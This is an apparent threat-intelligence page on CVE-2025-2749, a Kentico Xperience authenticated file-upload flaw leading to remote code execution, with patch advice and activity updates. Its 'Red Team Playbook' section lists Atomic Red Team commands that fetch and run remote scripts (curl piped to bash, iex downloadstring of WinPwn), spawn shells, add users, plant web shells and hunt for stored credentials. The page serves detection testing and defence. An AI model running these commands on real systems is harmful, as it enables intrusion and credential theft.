CVE-2025-2749
Overview
This vulnerability is an authenticated path traversal and arbitrary file upload flaw in Kentico Xperience's Staging Sync Server component. The root cause lies in insufficient validation of user-supplied file paths during the upload process, allowing traversal to unintended directories. This improper sanitization enables attackers to place files outside the intended storage location, including executable content, within affected versions through 13.0.178.
Vulnerability Description
An authenticated remote code execution in Kentico Xperience allows authenticated users Staging Sync Server to upload arbitrary data to path relative locations. This results in path traversal and arbitrary file upload, including content that can be executed server side leading to remote code execution.This issue affects Kentico Xperience through 13.0.178.
Impact
An attacker with valid authentication can upload and execute arbitrary code on the affected Kentico Xperience server, leading to full system compromise. This enables unauthorized control over server processes, data exfiltration, and potential lateral movement within the network. The prerequisite is possession of an authenticated user account with access to the Staging Sync Server functionality. Successful exploitation can result in significant business impact including service disruption and data breaches.
Solution
Kentico has released hotfixes addressing this vulnerability for Kentico Xperience versions through 13.0.178, available at https://devnet.kentico.com/download/hotfixes. Administrators should apply the latest patches as specified in the vendor’s advisory to remediate path traversal and file upload validation issues. No alternative workarounds are documented; therefore, timely application of the official hotfix is critical.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Kentico Xperience arises from an authenticated remote code execution flaw that allows users with sufficient permissions to upload arbitrary data to relative paths on the server. This issue is particularly concerning as it facilitates path traversal, enabling attackers to manipulate file paths and potentially upload malicious files to locations where they can be executed. The flaw is present in versions up to 13.0.178, making it critical for organizations utilizing this content management system to assess their exposure. The underlying weakness stems from inadequate validation of user input, specifically in the context of file uploads, which can lead to unauthorized access to sensitive directories and execution of arbitrary code.
Attack vectors for this vulnerability are multifaceted. An authenticated user, such as a content editor or administrator, could exploit the flaw by uploading a crafted file that contains malicious code. This could be achieved through the Staging Sync Server functionality, which is intended for synchronizing content across environments. Once the malicious file is uploaded, the attacker can trigger its execution, potentially gaining control over the server or accessing sensitive data. Scenarios may include uploading web shells, which allow for persistent access, or other payloads that could facilitate further attacks within the network. Given that the exploit requires only authenticated access, the risk is exacerbated in environments where user permissions are not tightly controlled.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Kentico Xperience for their web applications. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and significant reputational damage. The ability to execute arbitrary code on the server opens the door to a range of malicious activities, including data exfiltration, defacement of web applications, and lateral movement within the network. The business risk is heightened for organizations in regulated industries, where data breaches can result in substantial fines and legal repercussions. Furthermore, the potential for operational downtime and the costs associated with incident response can have lasting financial implications.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including penetration testing and code reviews, can help identify weaknesses in the application and its configuration. Additionally, organizations should enforce strict access controls to limit the number of authenticated users who can upload files, ensuring that only trusted personnel have the ability to perform such actions. Input validation and sanitization should be prioritized to prevent path traversal attacks, and file upload mechanisms should be configured to restrict the types of files that can be uploaded. Employing web application firewalls (WAFs) can also provide an additional layer of protection by monitoring and filtering out malicious requests.
In conclusion, the vulnerability in Kentico Xperience poses a significant threat to organizations using this platform. The potential for remote code execution through authenticated access highlights the need for robust security practices and vigilant monitoring. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Implementing effective detection and mitigation strategies will be crucial in safeguarding sensitive data and maintaining the integrity of web applications.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2025-2749, evidenced by new detections and its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition by CISA underscores the vulnerability’s elevated risk profile and signals increased attention from both defenders and threat actors. Concurrently, the vulnerability’s CVSS score has been updated to 7.2, reflecting its high severity and potential impact. Our telemetry further indicates a significant rise in the Exploit Prediction Scoring System (EPSS) score, now positioned in the upper percentile with a rapidly increasing trend, suggesting growing exploitation attempts or proof-of-concept activity in the wild. Although no new exploit details have surfaced, these developments collectively heighten the urgency for defenders to prioritize monitoring and response efforts. The evolving threat landscape around this authenticated remote code execution vulnerability in Kentico Xperience demands reassessment of risk, as the likelihood of exploitation is demonstrably increasing, thereby elevating the overall threat level to high.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2025-2749, with telemetry indicating a doubling in detection frequency over recent monitoring periods. Despite this surge, the Exploit Prediction Scoring System (EPSS) score has decreased significantly, reflecting a complex dynamic where increased detection may stem from heightened scanning or proof-of-concept testing rather than widespread exploitation. The vulnerability’s inclusion in the Known Exploited Vulnerabilities (KEV) catalog underscores its recognized risk, yet no new exploit techniques or ransomware affiliations have been identified to date. This divergence between rising detection signals and a declining EPSS score suggests that while adversaries are actively probing or validating the flaw, large-scale exploitation campaigns have not yet materialized. For defenders, this evolving pattern necessitates sustained vigilance as the vulnerability remains a credible threat vector with potential for escalation. Consequently, the overall threat level remains high, with an emphasis on monitoring for any shifts toward more aggressive exploitation behaviors.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Kentico | Xperience | All |
cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-2749 |
| labs.watchtowr.com |
GitHub CVE
technical-description
exploit
|
https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/ |
| devnet.kentico.com |
GitHub CVE
vendor-advisory
patch
|
https://devnet.kentico.com/download/hotfixes |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://www.vulncheck.com/advisories/kentico-xperience-staging-media-file-upload-authenticated-rce |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-2749 |